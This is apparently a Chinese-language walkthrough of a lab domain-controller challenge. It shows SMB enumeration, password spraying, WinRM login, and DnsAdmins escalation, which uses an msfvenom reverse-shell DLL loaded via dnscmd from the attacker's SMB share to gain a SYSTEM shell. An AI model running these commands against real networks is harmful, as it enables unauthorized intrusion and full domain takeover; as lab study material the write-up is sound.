难度:AVANZADO
kali:192.168.10.3
靶机:192.168.10.5
按照附件给的配置无法扫端口,因为DHCP服务IP跟靶机IP一样了,改一下DHCP服务器地址就行了
root@kali2 [/tmp] ➜ arp-scan -l [10:09:51]
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.10.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 0a:00:27:00:00:46 (Unknown: locally administered)
192.168.10.5 08:00:27:62:81:1d PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.213 seconds (115.68 hosts/sec). 2 responded端口扫描
root@kali2 [~] ➜ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.10.5 -oG ports.txt [11:01:27]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 11:01 CST
Nmap scan report for 192.168.10.5
Host is up (0.00027s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
49676/tcp open unknown
49686/tcp open unknown
MAC Address: 08:00:27:24:63:2C (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
root@kali2 [~] ➜ cat ports.txt | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',' [11:01:53]
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49673,49676,49686
root@kali2 [~] ➜ nmap -sV -A 192.168.10.5 -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49673,49676,49686 [11:02:00]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 11:02 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.10.5
Host is up (0.00017s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-12 10:02:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:24:63:2C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h39m56s, deviation: 34m37s, median: 6h59m55s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WIN-VRU3GG3DPLJ
| NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
| Domain name: DORAEMON.THL
| Forest name: DORAEMON.THL
| FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL
|_ System time: 2024-11-12T11:03:19+01:00
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:24:63:2c (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-12T10:03:19
|_ start_date: 2024-11-12T09:56:59
TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms 192.168.10.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.26 seconds有winrm服务,还拿到一个域名,添加到hosts DORAEMON.THL
SMB探测
看一下共享目录
root@kali2 [~] ➜ smbclient --no-pass -L //DORAEMON.THL [11:04:45]
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Admin remota
C$ Disk Recurso predeterminado
gorrocoptero Disk
IPC$ IPC IPC remota
NETLOGON Disk Recurso compartido del servidor de inicio de sesión
SYSVOL Disk Recurso compartido del servidor de inicio de sesión
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to DORAEMON.THL failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available内容很丰富啊,看一下自定义的这个gorrocoptero
root@kali2 [~] ➜ smbclient //DORAEMON.THL/gorrocoptero --no-pass [11:08:26]
Try "help" to get a list of possible commands.
smb: \> ls
. DH 0 Wed Oct 2 17:17:24 2024
.. DH 0 Wed Oct 2 17:17:24 2024
kedadawapa.txt A 1843 Wed Oct 2 17:18:00 2024
7735807 blocks of size 4096. 4831151 blocks available
smb: \> root@kali2 [~] ➜ cat kedadawapa.txt [11:09:06]
Atención al grupo especial Dorayaki1 de Estepona
- Doraemon: ¡Hola, chicos! ¿Qué les parece si vamos a comer dorayakis hoy?
- Nobita: ¡SÃ! ¡Me encantan los dorayakis! Pero… ¿dónde vamos a conseguirlos?
- Shizuka: He oÃdo que hay una nueva tienda de dorayakis en la esquina de la calle. ¡Dicen que son los mejores de la ciudad!
- Suneo: Oh, por favor. Siempre hay algo nuevo. No puedo esperar para probarlos. ¡Espero que sean más grandes que los de la tienda anterior!
- Gigante: ¡Quiero que sean enormes! ¡Y que tengan mucho relleno! Si no, ¡no me importa ir!
- Doraemon: Bueno, podemos pedirle a Nobita que use el poder de la máquina de tiempo para viajar al futuro y traernos unos dorayakis del año 3000.
- Nobita: ¡Espera! No sé si deberÃa usar la máquina. La última vez que lo hice, terminé en un lugar lleno de robots raros…
- Shizuka: No te preocupes, Nobita. Solo vamos a la tienda. No necesitamos ir al futuro. ¡Podemos ir a pie!
- Suneo: Eso suena aburrido. ¿Por qué no hacemos una carrera? El primero en llegar a la tienda puede elegir el sabor de los dorayakis.
- Gigante: ¡Me encanta esa idea! Pero, ¡tendrás que correr rápido para ganarme, Suneo!
- Doraemon: ¿Y si mejor vamos todos juntos? Asà disfrutamos del camino. Además, ¡puedo usar el futurófono para pedir un montón de dorayakis para que nos estén esperando!
- Nobita: ¡Esa es una gran idea, Doraemon! Asà no tengo que correr y me aseguro de que haya suficiente para todos.
- Shizuka: ¡Perfecto! Entonces, ¡vamos a la tienda de dorayakis!
- Suneo: ¡SÃ! ¡Dorayakis, allá vamos!
- Gigante: ¡No se olviden de mÃ! ¡Voy a ganar!
- Doraemon: ¡A comer dorayakis!虽然都是西班牙语还是拿到了一些用户名还有一个用户组Dorayaki1
root@kali2 [~] ➜ cat kedadawapa.txt | grep -oP "^- \K\w+" [11:11:55]
Doraemon
Nobita
Shizuka
Suneo
Gigante
Doraemon
Nobita
Shizuka
Suneo
Gigante
Doraemon
Nobita
Shizuka
Suneo
Gigante
Doraemon拿到用户名先尝试一下AS-REP
root@kali2 [~] ➜ GetNPUsers.py -usersfile user.txt -no-pass -dc-ip 192.168.10.5 DORAEMON.THL/
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nobita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shizuka doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suneo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gigante doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nobita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shizuka doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suneo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gigante doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nobita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shizuka doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suneo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gigante doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set失败
爆破密码
没有其他信息的情况下,尝试用用户组名当作密码爆破
root@kali2 [~] ➜ crackmapexec smb 192.168.10.5 -u user.txt -p Dorayaki1 --continue-on-success [11:28:16]
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Suneo:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Suneo:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Suneo:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1 拿到一组凭据Doraemon:Dorayaki1,尝试winrm登录
winrm登录
root@kali2 [~] ➜ evil-winrm -i 192.168.10.5 -u Doraemon [11:28:18]
Enter Password:
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Doraemon\Documents> whoami
doraemon\doraemon登录成功,收集信息
竟然没有user flag
Directorio: C:\Users\Doraemon
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/16/2016 3:23 PM Desktop
d-r--- 10/1/2024 12:23 PM Documents
d-r--- 7/16/2016 3:23 PM Downloads
d-r--- 7/16/2016 3:23 PM Favorites
d-r--- 10/1/2024 12:32 PM Links
d-r--- 7/16/2016 3:23 PM Music
d-r--- 7/16/2016 3:23 PM Pictures
d----- 7/16/2016 3:23 PM Saved Games
d-r--- 7/16/2016 3:23 PM Videos有个特别的目录Links
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir -force
Directorio: C:\Users\Doraemon\Links
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 10/1/2024 12:35 PM 58 Carta de amor a Shizuka.txt里面有个隐藏文件
*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345
拿到了一个新密码,看起来还是Doraemon的,密码喷洒一下
root@kali2 [~] ➜ crackmapexec smb 192.168.10.5 -u user.txt -p ShizukaTeAmobb12345 --continue-on-success [11:37:34]
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE 事实上是Suneo的
*Evil-WinRM* PS C:\Users\Suneo> cd Desktop
*Evil-WinRM* PS C:\Users\Suneo\Desktop> dir
Directorio: C:\Users\Suneo\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2024 11:19 AM 36 user.txt
*Evil-WinRM* PS C:\Users\Suneo\Desktop> type user.txt
**************拿到user flag了,开始提权
DNSAdmins
*Evil-WinRM* PS C:\Users\Suneo\Desktop> whoami /all
INFORMACIàN DE USUARIO
----------------------
Nombre de usuario SID
================= =============================================
doraemon\suneo S-1-5-21-3046175042-3013395696-775018414-1108
INFORMACIàN DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
================================================================== ============== ============================================= =====================================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios de administraci¢n remota Alias S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Acceso compatible con versiones anteriores de Windows 2000 Alias S-1-5-32-554 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\NETWORK Grupo conocido S-1-5-2 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa¤¡a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
DORAEMON\DnsAdmins Grupo S-1-5-21-3046175042-3013395696-775018414-1101 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
DORAEMON\Dorayaki Alias S-1-5-21-3046175042-3013395696-775018414-1109 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado, Grupo local
NT AUTHORITY\Autenticaci¢n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio alto Etiqueta S-1-16-8448
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
INFORMACIàN DE NOTIFICACIONES DE USUARIO
-----------------------
Notificaciones de usuario desconocidas.
Se ha deshabilitado la compatibilidad de Kerberos para el control de acceso din mico en este dispositivo.看一下有没有什么特殊的组,经过一番搜索发现DnsAdmins是个特权组,可以以system权限执行任意dll
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins
生成一个反弹shell的dll吧
root@kali2 [/tmp] ➜ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.3 LPORT=4567 -f dll -o exp.dll [11:48:06]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: exp.dll在kali上开个smb共享
root@kali2 [/tmp] ➜ impacket-smbserver -smb2support "share" . [11:48:35]
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed*Evil-WinRM* PS C:\Users\Suneo\Desktop> dnscmd /config /serverlevelplugindll \\192.168.10.3\share\exp.dll
Propiedad del Registro serverlevelplugindll restablecida correctamente.
Comando completado correctamente.看起来是配置成功了,西班牙语看不懂,但是能看懂correct,然后重启dns服务
*Evil-WinRM* PS C:\Users\Suneo\Desktop> sc.exe \\DORAEMON.THL stop dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
CàD_SALIDA_WIN32 : 0 (0x0)
CàD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x1
INDICACIàN_INICIO : 0x7530
*Evil-WinRM* PS C:\Users\Suneo\Desktop> sc.exe \\DORAEMON.THL start dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
CàD_SALIDA_WIN32 : 0 (0x0)
CàD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x1
INDICACIàN_INICIO : 0x4e20
PID : 2244
MARCAS :root@kali2 [/tmp] ➜ nc -lnvp 4567 [11:51:13]
listening on [any] 4567 ...
connect to [192.168.10.3] from (UNKNOWN) [192.168.10.5] 49851
Microsoft Windows [Versi�n 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>这边也是弹回了shell
C:\Users\Administrador\Desktop>dir
dir
El volumen de la unidad C no tiene etiqueta.
El n�mero de serie del volumen es: 5E12-227F
Directorio de C:\Users\Administrador\Desktop
02/10/2024 10:19 <DIR> .
02/10/2024 10:19 <DIR> ..
02/10/2024 10:19 32 root.txt
1 archivos 32 bytes
2 dirs 19.864.584.192 bytes libres
C:\Users\Administrador\Desktop>type root.txt
type root.txt
************